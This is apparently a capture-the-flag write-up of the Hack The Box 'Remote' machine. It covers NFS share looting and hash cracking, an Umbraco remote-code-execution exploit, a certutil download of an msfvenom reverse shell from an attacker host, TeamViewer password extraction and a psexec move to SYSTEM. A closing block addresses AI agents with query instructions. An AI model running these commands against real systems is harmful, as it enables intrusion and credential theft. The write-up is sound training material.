# Remote ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-29d4a2c7b9970f0a5ff771c637e28faca5597dce%2Fimage.png?alt=media) ## Scanning and Enumeration ### Nmap ``` nmap 10.10.10.180 -p- -v -sS -T4 -sV PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 111/tcp open rpcbind 2-4 (RPC #100000) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 2049/tcp open mountd 1-3 (RPC #100005) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49679/tcp open msrpc Microsoft Windows RPC 49680/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` After this we can attempt to discover the OS version with the SMB discocvery script and the `-O` switch enabled. We have a best guest of Windows 10 1709. ``` nmap 10.10.10.180 -O -p 135,139,445 -sV --script=smb-os-discovery PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows 10 1709 - 1803 (91%), Microsoft Windows 10 1809 - 1909 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### Port 21 FTP As port 21 is open we can check for anonymous login with the Nmap script `--script=ftp-anon.nse` ``` nmap 10.10.10.180 -p 21 --script=ftp-anon.nse PORT STATE SERVICE 21/tcp open ftp |_ftp-anon: Anonymous FTP login allowed (FTP code 230) ``` I logged in with the anonymous user and tried to look for files or any hidden files. With nothing at all found I tested for file upload and was given access denied. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e453736be944b22eeec3034aadf91945be4e874f%2Fimage.png?alt=media) ### Port 80 We have a web server running on port 80. Navigating to the root page brings us to the following: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2784562618680ebfba9af305215dfeeaccf5aaa2%2Fimage.png?alt=media) Before proceeding lets run a directory brute force on the webpage. I will be using [`feroxbuster`](https://github.com/epi052/feroxbuster) for this. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-641d1aef44a090735a8ec45d9ae069d39a98910e%2Fimage.png?alt=media) Scrolling down from the root page and we see some recent posts mentioning Umbraco. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-789ba248b9c48a5648f083568dcfa7016dda9c6b%2Fimage.png?alt=media) The Wappalyzer extension for Firefox also confirms the website is running Umbraco. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3e5ec74fe5ca09ef35c0486ed4fd3009afcaba5a%2Fimage.png?alt=media) At this point I have manually looked through the website more and was unable to find anything else interesting. Going back to our nmap scan earlier we do have Port 2049 open. ### Port 2049 mountd mountd is a mount deamon for the Network File System (NFS). We can use the `showmount -e` command to view shareable directories on a remote system. ``` showmount -e 10.10.10.180 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5c836470b9b9a79f5112b9b43d963428b0e12825%2Fimage.png?alt=media) In preparation for mounting the share create a directory in which we can mount the share inside of. I created the following share `/tmp/remotemount`. Run the following command to mount the share. ``` mount-t 10.10.10.180:/site_backups /tmp/remotemount/ ``` We can then use the `df -k` command to list mounted shares and confirm if working. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c631924f5661cef921acccfbe8c5b86a80baab1d%2Fimage.png?alt=media) We can now move into the directory. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4eebd0b9530c80e8b4599842a86c4a7b3a86cac4%2Fimage.png?alt=media) At this point I have spent some time going around the remote directory and could not find anything interesting. Since we are dealing with quite a large amount of folders we need to find a way to go through each file and identify potential interesting information. As App\_Data usually contains interesting information I will begin by recursively running `cat` and `grep` to look for keywords contained in files. ``` ls -R * | cat * | grep -r username ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a52533cb397740c989ffa0a57c0feefd2f968f55%2Fimage.png?alt=media) The output is quite large so I have only taken a snippet but we have gained the following information from this: | Usernames | Passwords | | ------------------ | ----------------- | | | Umbracoadmin123!! | | | | Before we attempt to look where to use these found credentials lets use them in our command above to see if these accounts are contained elsewhere. ``` ls -R * | cat * | grep -r ssmith ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4adc1147d6d2ad85b4201918ca5ab9a42279be08%2Fimage.png?alt=media) We have a similar results this time and we also have the line at the bottom stating that "Binary file Umbraco.sdf matches". We can specify the strings command on this file since its is a binary file. ``` strings Umbraco.sdf | grep ssmith ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-809ce24944c16cfb0bad652f1203b44f611f18fa%2Fimage.png?alt=media) Lets check if we can find anything for the admin account in this file. ``` strings Umbraco.sdf | grep admin@htb.local ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-208f6a742ebe89b7785ac5ffb05695e05779bb5f%2Fimage.png?alt=media) The output suggest SHA1 hash. We can double confirm this using hash-identifier. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a8275793e46c2a7c125c544d06de9fa4330e3013%2Fimage.png?alt=media) I put the hash in a text file and run John the Ripper against it. ``` john --wordlist=/usr/share/wordlists/rockyou.txt /home/kali/Desktop/hash ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-89b8d448b6519ec56f4212456b40a1ec3c60fc8e%2Fimage.png?alt=media) We have obtained the credentials ":baconandcheese" Going back to feroxbuster we find that one of the directories that has been discovered is `/install.` When we head over to this URL we are presented with the following login page which accepts the credentials we have found. ![Logon screen at /install](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-49a009b82c419e5e59a4caad02df94943cdefbd6%2Fimage.png?alt=media) ![After logging in](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5ef2c8f7aec323a4a53eb034af9d280f24f7270%2Fimage.png?alt=media) Clicking help in the bottom left allows us to view the current running version of Umbraco. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-da2d28df3083103a96865872d4f98eefc26cc44d%2Fimage.png?alt=media) At this point I went to Google and searched for "Umbraco 7.12.4 Windows exploit" and come across this: {% embed url="" %} I downloaded the python script and done a test command to check if working. ``` python exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c ipconfig ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-80e821920f13b2fe9416f1122df19236507ca5d0%2Fimage.png?alt=media) Now that we have command execution we need to think about getting a proper reverse shell as this would be preferable to our current one. I created a payload with `msfvenom` as below: ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=4455 -f exe -o /home/kali/scripts/windows/revshell.exe ``` After this was created I hosted a python server in the directory where the payload is stored. ``` Python -m SimpleHttpServer 80 ``` After this we can run the following command on the exploit to download the file and place it in a global writeable directory. The server the exploit command is run from is not writeable to the account we are running as. ``` python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c cmd.exe -a '/c certutil.exe -f -urlcache -split http://10.10.14.14/reverseshell.exe c:/users/public/reverseshell.exe' ``` After this has been completed we can confirm if the file has been downloaded by checking our python server logs. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-caa9e25c1452d4867326012d3645d34b2ad53971%2Fimage.png?alt=media) After this we need to setup a `netcat` listener on our attacking machine. ``` nc -lvp 4455 ``` Once this is setup we can run the exploit again this time calling the `msfvenom` payload we put in `C:\users\Public` earlier on. ``` sudo python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c cmd.exe -a '/c c:/users/public/reverseshell.exe ' ``` Once this is run we should get a call back on our listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7d1fe18f402b74718ccb65007319d03a47bd2365%2Fimage.png?alt=media) As per standard practice I transferred over `winPEAS.exe` using `certuil.exe` and then run it. I found TeamViewer7 as being an installed application. Knowing that 7 is an old version of Teamviewer I went to Google to research exploits. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-920f59f4afb7c21c4ec80f1f4452420859ca8de7%2Fimage.png?alt=media) After searching for exploits with the current version we come across this which has a CVE score of 7.0. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a69462af0565625c638b07c050c2c989e80e097%2Fimage.png?alt=media) {% embed url="" %} We also find a brilliant blog post covering this exploit. {% embed url="" %} If we search for the CVE number on Github we come across multiple PoC scripts. In this case I will be using the Powershell "WatchTV" by zaphoxx. {% embed url="" %} I downloaded the script onto the victim machine and loaded it into Powershell. I then run the command `Get-TeamViewPasswords`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-21d4a2d58c845c7c85f0921bd267b4d35fb6fde5%2Fimage.png?alt=media) We retrieve the password: !R3m0te! With this we are hoping for password reuse somewhere. We should now see where we can use this with known credentials. For access I have gone over using Impacket's psexec.py before so this time I will instead use the metasploit module `exploit/windows/smb/psexec` . Load the module and set the required options. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a1cdeb8f39f80d07bf3722ed6ec4cf4607ba7f2a%2Fimage.png?alt=media) We now have access as system and can grab bother user and root flags. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/windows-machines/remote.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.